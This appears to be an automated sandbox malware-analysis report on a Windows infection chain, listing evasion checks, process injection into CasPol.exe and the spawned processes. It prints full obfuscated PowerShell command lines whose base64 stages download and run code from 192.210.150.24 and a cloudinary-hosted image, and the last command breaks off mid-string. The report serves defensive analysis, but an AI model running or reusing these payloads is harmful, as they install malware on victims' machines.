                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E54F Sleep,ExitProcess,12_2_0040E54F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004198D2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6855Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2765Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3911Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5872Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 4304Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 5645Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 8.8 %
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5132Thread sleep count: 6855 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 776Thread sleep count: 2765 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3544Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4888Thread sleep count: 4304 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4888Thread sleep time: -12912000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4888Thread sleep count: 5645 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4888Thread sleep time: -16935000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B43F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044D5F9 FindFirstFileExA,12_2_0044D5F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C79
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: CasPol.exe, 0000000C.00000002.4561290928.0000000001068000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                    Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: wscript.exe, 00000007.00000003.2236902758.0000000005765000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.2250935390.0000000007465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                    Source: powershell.exe, 00000003.00000002.2252958107.0000000008473000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2252958107.000000000842A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000008.00000002.2517116385.0000000006E7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_12-47423
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A66D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00442564 mov eax, dword ptr fs:[00000030h]12_2_00442564
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044E93E GetProcessHeap,12_2_0044E93E
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434178
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A66D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00433B54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433CE7 SetUnhandledExceptionFilter,12_2_00433CE7

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: amsi32_6556.amsi.csv, type: OTHER
                    Source: Yara matchFile source: amsi32_6556.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D1A008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_00410F36
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418764 mouse_event,12_2_00418764
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5305.tmp" "c:\Users\user\AppData\Local\Temp\yy1wu0jg\CSCCF35FBE9A0D8429B84CE9BA7B3CB93B6.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleateJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdzamhdny2dit1g1icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelvrzcgugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1vti5ebgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig9xaxbuewzfvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkdsvvvfc0ksc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifmsdwludcagicagicagicagicagicagicagicagicagicagicagicbpdfrvehr6cyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicague1sktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpykyiicagicagicagicagicagicagicag